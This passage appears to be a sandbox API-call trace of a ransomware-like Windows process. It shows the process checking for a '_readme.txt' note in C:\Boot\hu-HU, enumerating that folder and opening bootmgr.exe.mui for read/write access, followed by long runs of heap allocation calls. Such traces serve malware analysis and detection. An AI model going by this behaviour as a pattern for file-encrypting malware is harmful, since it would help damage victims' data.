(HeapHandle=0x6e0000, Flags=0x0, Size=0x800) returned 0x329e270 [0146.766] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x329e270 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0146.766] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x810) returned 0x328ec10 [0146.766] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.767] FreeLibrary (hLibModule=0x75f80000) returned 1 [0146.767] PathAppendW (in: pszPath="C:\\Boot\\hu-HU\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\hu-HU\\_readme.txt") returned 1 [0146.767] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328f498 [0146.767] PathFileExistsW (pszPath="C:\\Boot\\hu-HU\\_readme.txt") returned 1 [0146.767] FindFirstFileW (in: lpFileName="C:\\Boot\\hu-HU\\*", lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1eb6bcb0, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1eb6bcb0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3220d58 [0146.767] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1eb6bcb0, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1eb6bcb0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0146.767] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe817e7d8, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16240, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0146.767] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.767] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x40) returned 0x31f6be0 [0146.767] PathFindExtensionW (pszPath="C:\\Boot\\hu-HU\\bootmgr.exe.mui") returned=".mui" [0146.767] CreateFileW (lpFileName="C:\\Boot\\hu-HU\\bootmgr.exe.mui" (normalized: "c:\\boot\\hu-hu\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0146.767] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1eb6bcb0, ftCreationTime.dwHighDateTime=0x1d5956a, ftLastAccessTime.dwLowDateTime=0x1eb6bcb0, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1eb6bcb0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x45d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0146.767] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.767] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x40) returned 0x31f6be0 [0146.767] PathFindExtensionW (pszPath="C:\\Boot\\hu-HU\\_readme.txt") returned=".txt" [0146.767] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1eb6bcb0, ftCreationTime.dwHighDateTime=0x1d5956a, ftLastAccessTime.dwLowDateTime=0x1eb6bcb0, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1eb6bcb0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x45d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0146.767] FindClose (in: hFindFile=0x3220d58 | out: hFindFile=0x3220d58) returned 1 [0146.768] PeekMessageW (in: lpMsg=0x391ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391ff08) returned 0 [0146.768] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240ca8 [0146.768] PeekMessageW (in: lpMsg=0x391fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391fb74) returned 0 [0146.768] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.768] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328f498 [0146.768] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.768] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.768] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.768] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328f498 [0146.768] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.768] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.768] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.768] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328f498 [0146.768] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.768] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.768] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.768] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328f498 [0146.768] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.768] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.768] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.768] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328f498 [0146.768] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.768] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.768] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.768] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x840) returned 0x328f498 [0146.768] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.768] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.768] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.768] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328f498 [0146.768] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0xc2e) returned 0x329e270 [0146.768] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.768] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.768] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.768] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.768] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328f498 [0146.768] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.768] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.769] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.769] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x840) returned 0x328f498 [0146.769] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.769] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.769] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.769] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x860) returned 0x329e270 [0146.769] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.769] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.769] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.769] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x860) returned 0x329e270 [0146.769] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.769] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.769] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.769] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328f498 [0146.769] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.769] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.769] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.769] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328f498 [0146.769] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.769] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.769] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.769] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x840) returned 0x328f498 [0146.769] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.769] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.769] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.769] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x840) returned 0x328f498 [0146.769] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.769] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.769] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.769] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328f498 [0146.769] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.769] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.769] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.769] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328f498 [0146.769] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.769] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.769] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.769] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328f498 [0146.770] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.770] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.770] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.770] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328f498 [0146.770] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.770] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.770] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.770] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328f498 [0146.770] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.770] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.770] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.770] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328f498 [0146.770] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.770] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.770] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.770] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328f498 [0146.770] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.770] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.770] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.770] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328f498 [0146.770] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0xc46) returned 0x329e270 [0146.770] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.770] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.770] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.770] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.770] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328f498 [0146.770] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.770] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.770] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.770] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328f498 [0146.770] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0xc2e) returned 0x329e270 [0146.770] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.770] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.770] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.770] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.770] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x860) returned 0x329e270 [0146.770] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.771] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.771] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.771] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x860) returned 0x329e270 [0146.771] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.771] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.771] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.771] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328f498 [0146.771] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.771] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.771] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.771] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328f498 [0146.771] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.771] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.771] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.771] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328f498 [0146.771] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0xc46) returned 0x329e270 [0146.771] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.771] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.771] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.771] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.771] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x840) returned 0x328f498 [0146.771] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.771] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.771] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.771] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x840) returned 0x328f498 [0146.771] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.771] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.771] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.771] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328f498 [0146.771] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.771] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.771] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.771] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328f498 [0146.771] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.771] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.771] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.771] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328f498 [0146.772] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.772] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.772] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.772] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328f498 [0146.772] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.772] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.772] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.772] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328f498 [0146.772] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.772] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.772] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.772] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328f498 [0146.772] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.772] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.772] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.772] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328f498 [0146.772] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.772] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.772] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.772] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328f498 [0146.772] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0xc46) returned 0x329e270 [0146.772] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.772] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.772] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.772] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.772] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328f498 [0146.772] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.772] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.772] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.772] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x860) returned 0x329e270 [0146.772] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.772] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.772] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.772] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x860) returned 0x329e270 [0146.772] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.773] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.773] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.773] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328f498 [0146.773] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.773] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.773] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.773] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328f498 [0146.773] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.773] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.773] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.773] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328f498 [0146.773] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0xc46) returned 0x329e270 [0146.773] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.773] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.773] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.773] RtlAllocateHeap (HeapHandle=0x6e0000, 